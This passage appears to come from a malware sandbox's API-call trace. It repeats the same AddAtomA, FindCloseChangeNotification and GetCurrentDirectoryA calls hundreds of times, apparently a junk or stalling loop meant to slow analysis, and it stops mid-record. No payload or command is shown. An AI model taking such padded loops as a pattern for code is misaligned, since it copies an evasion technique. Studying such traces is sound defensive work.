AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.983] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.983] AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.983] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.983] AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.983] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.983] AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.983] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.983] AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.983] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.983] AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.983] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.983] AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.983] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.983] AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.983] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.983] AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.984] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.984] AddAtomA (lpString=0x0) returned 0x0 [0130.984] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.984] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.984] AddAtomA (lpString=0x0) returned 0x0 [0130.984] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.984] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.984] AddAtomA (lpString=0x0) returned 0x0 [0130.984] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.984] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.984] AddAtomA (lpString=0x0) returned 0x0 [0130.984] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.984] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.984] AddAtomA (lpString=0x0) returned 0x0 [0130.984] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.984] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.984] AddAtomA (lpString=0x0) returned 0x0 [0130.984] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.984] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.984] AddAtomA (lpString=0x0) returned 0x0 [0130.984] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.984] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.984] AddAtomA (lpString=0x0) returned 0x0 [0130.984] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.984] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.984] AddAtomA (lpString=0x0) returned 0x0 [0130.984] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.985] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.985] AddAtomA (lpString=0x0) returned 0x0 [0130.985] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.985] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.985] AddAtomA (lpString=0x0) returned 0x0 [0130.985] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.985] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.985] AddAtomA (lpString=0x0) returned 0x0 [0130.985] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.985] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.985] AddAtomA (lpString=0x0) returned 0x0 [0130.985] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.985] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.985] AddAtomA (lpString=0x0) returned 0x0 [0130.985] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.985] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.985] AddAtomA (lpString=0x0) returned 0x0 [0130.985] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.985] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.985] AddAtomA (lpString=0x0) returned 0x0 [0130.985] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.985] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.985] AddAtomA (lpString=0x0) returned 0x0 [0130.985] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.986] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.986] AddAtomA (lpString=0x0) returned 0x0 [0130.986] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.986] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.986] AddAtomA (lpString=0x0) returned 0x0 [0130.986] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.986] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.986] AddAtomA (lpString=0x0) returned 0x0 [0130.986] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.986] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.986] AddAtomA (lpString=0x0) returned 0x0 [0130.986] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.986] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.986] AddAtomA (lpString=0x0) returned 0x0 [0130.986] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.986] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.986] AddAtomA (lpString=0x0) returned 0x0 [0130.986] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.986] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.986] AddAtomA (lpString=0x0) returned 0x0 [0130.986] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.986] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.986] AddAtomA (lpString=0x0) returned 0x0 [0130.986] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.987] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.987] AddAtomA (lpString=0x0) returned 0x0 [0130.987] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.987] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.987] AddAtomA (lpString=0x0) returned 0x0 [0130.987] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.987] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.987] AddAtomA (lpString=0x0) returned 0x0 [0130.987] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.987] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.987] AddAtomA (lpString=0x0) returned 0x0 [0130.987] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.987] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.987] AddAtomA (lpString=0x0) returned 0x0 [0130.987] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.987] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.987] AddAtomA (lpString=0x0) returned 0x0 [0130.987] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.987] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.987] AddAtomA (lpString=0x0) returned 0x0 [0130.987] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.987] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.987] AddAtomA (lpString=0x0) returned 0x0 [0130.987] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.987] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.988] AddAtomA (lpString=0x0) returned 0x0 [0130.988] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.988] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.988] AddAtomA (lpString=0x0) returned 0x0 [0130.988] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.988] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.988] AddAtomA (lpString=0x0) returned 0x0 [0130.988] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.988] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.988] AddAtomA (lpString=0x0) returned 0x0 [0130.988] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.988] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.988] AddAtomA (lpString=0x0) returned 0x0 [0130.988] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.988] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.988] AddAtomA (lpString=0x0) returned 0x0 [0130.988] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.988] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.988] AddAtomA (lpString=0x0) returned 0x0 [0130.988] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.988] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.988] AddAtomA (lpString=0x0) returned 0x0 [0130.988] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.988] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.989] AddAtomA (lpString=0x0) returned 0x0 [0130.989] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.989] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.989] AddAtomA (lpString=0x0) returned 0x0 [0130.989] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.989] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.989] AddAtomA (lpString=0x0) returned 0x0 [0130.989] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.989] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.989] AddAtomA (lpString=0x0) returned 0x0 [0130.989] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.989] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.989] AddAtomA (lpString=0x0) returned 0x0 [0130.989] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.989] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.989] AddAtomA (lpString=0x0) returned 0x0 [0130.989] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.989] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.989] AddAtomA (lpString=0x0) returned 0x0 [0130.989] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.989] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.989] AddAtomA (lpString=0x0) returned 0x0 [0130.989] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.989] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.990] AddAtomA (lpString=0x0) returned 0x0 [0130.990] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.990] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.990] AddAtomA (lpString=0x0) returned 0x0 [0130.990] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.990] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.990] AddAtomA (lpString=0x0) returned 0x0 [0130.990] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.990] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.990] AddAtomA (lpString=0x0) returned 0x0 [0130.990] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.990] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.990] AddAtomA (lpString=0x0) returned 0x0 [0130.990] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.990] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.990] AddAtomA (lpString=0x0) returned 0x0 [0130.990] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.990] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.991] AddAtomA (lpString=0x0) returned 0x0 [0130.991] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.991] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.991] AddAtomA (lpString=0x0) returned 0x0 [0130.991] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.991] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.991] AddAtomA (lpString=0x0) returned 0x0 [0130.991] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.991] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.991] AddAtomA (lpString=0x0) returned 0x0 [0130.991] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.991] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.991] AddAtomA (lpString=0x0) returned 0x0 [0130.991] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.991] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.991] AddAtomA (lpString=0x0) returned 0x0 [0130.991] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.991] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.991] AddAtomA (lpString=0x0) returned 0x0 [0130.991] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.991] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.991] AddAtomA (lpString=0x0) returned 0x0 [0130.991] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.991] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.992] AddAtomA (lpString=0x0) returned 0x0 [0130.992] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.992] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.992] AddAtomA (lpString=0x0) returned 0x0 [0130.992] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.992] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.992] AddAtomA (lpString=0x0) returned 0x0 [0130.992] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.992] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.992] AddAtomA (lpString=0x0) returned 0x0 [0130.992] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.992] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.992] AddAtomA (lpString=0x0) returned 0x0 [0130.992] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.992] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.992] AddAtomA (lpString=0x0) returned 0x0 [0130.992] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.992] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.992] AddAtomA (lpString=0x0) returned 0x0 [0130.992] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.992] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.992] AddAtomA (lpString=0x0) returned 0x0 [0130.992] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.992] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.992] AddAtomA (lpString=0x0) returned 0x0 [0130.993] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.993] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.993] AddAtomA (lpString=0x0) returned 0x0 [0130.993] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.993] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.993] AddAtomA (lpString=0x0) returned 0x0 [0130.993] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.993] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.993] AddAtomA (lpString=0x0) returned 0x0 [0130.993] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.993] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.993] AddAtomA (lpString=0x0) returned 0x0 [0130.993] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.993] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.993] AddAtomA (lpString=0x0) returned 0x0 [0130.993] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.993] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.993] AddAtomA (lpString=0x0) returned 0x0 [0130.993] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.993] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.993] AddAtomA (lpString=0x0) returned 0x0 [0130.993] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.993] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.993] AddAtomA (lpString=0x0) returned 0x0 [0130.993] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.994] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.994] AddAtomA (lpString=0x0) returned 0x0 [0130.994] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.994] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.994] AddAtomA (lpString=0x0) returned 0x0 [0130.994] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.994] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.994] AddAtomA (lpString=0x0) returned 0x0 [0130.994] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.994] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.994] AddAtomA (lpString=0x0) returned 0x0 [0130.994] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.994] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.994] AddAtomA (lpString=0x0) returned 0x0 [0130.994] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.994] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.994] AddAtomA (lpString=0x0) returned 0x0 [0130.994] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.994] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.994] AddAtomA (lpString=0x0) returned 0x0 [0130.994] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.994] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.994] AddAtomA (lpString=0x0) returned 0x0 [0130.994] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.995] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.995] AddAtomA (lpString=0x0) returned 0x0 [0130.995] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.995] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.995] AddAtomA (lpString=0x0) returned 0x0 [0130.995] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.995] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.995] AddAtomA (lpString=0x0) returned 0x0 [0130.995] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.995] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.995] AddAtomA (lpString=0x0) returned 0x0 [0130.995] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.995] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.995] AddAtomA (lpString=0x0) returned 0x0 [0130.995] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.995] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.995] AddAtomA (lpString=0x0) returned 0x0 [0130.995] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.995] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.995] AddAtomA (lpString=0x0) returned 0x0 [0130.996] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.996] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.996] AddAtomA (lpString=0x0) returned 0x0 [0130.996] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.996] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.996] AddAtomA (lpString=0x0) returned 0x0 [0130.996] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.996] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.996] AddAtomA (lpString=0x0) returned 0x0 [0130.996] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.996] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.996] AddAtomA (lpString=0x0) returned 0x0 [0130.996] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.996] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.996] AddAtomA (lpString=0x0) returned 0x0 [0130.996] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.996] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.996] AddAtomA (lpString=0x0) returned 0x0 [0130.996] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.996] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.996] AddAtomA (lpString=0x0) returned 0x0 [0130.997] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.997] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.997] AddAtomA (lpString=0x0) returned 0x0 [0130.997] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.997] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 